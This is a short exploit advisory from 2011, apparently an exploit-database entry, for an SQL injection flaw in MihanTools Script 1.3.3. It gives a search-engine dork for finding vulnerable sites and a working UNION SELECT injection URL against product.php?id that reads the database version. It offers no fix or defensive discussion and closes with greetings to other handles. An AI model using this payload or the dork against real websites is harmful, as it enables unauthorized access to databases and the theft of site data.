MihanTools Script version 1.3.3 suffers from a remote SQL injection vulnerability.
4b8a9b355e11d4f0b10ae4d93ae60547605e9ba08172faf5d1500bfd92c45a3e
# Exploit Title: MihanTools Script SQL Injection Vunerability
# Platform: php
# Date: 09.02.2011
# Author: WHITE_DEVIL
# Software Link: http://www.mihantools.ir/
# Version: all version
# Tested on: Windows Sp2
# Mail: Mr.web70@yahoo.com
# Dork: inurl:product.php?id= *Powered by MihanTools*
# Exploit:
http://localhost/product.php?id=-1+union+select+version(),2,3,4,5,6,7,8,9,10,11,12,13,14--
# Greetings:
IRAQ_JAGUAR, Joker_Sql, Karar_Alshami, Karar_Aljbory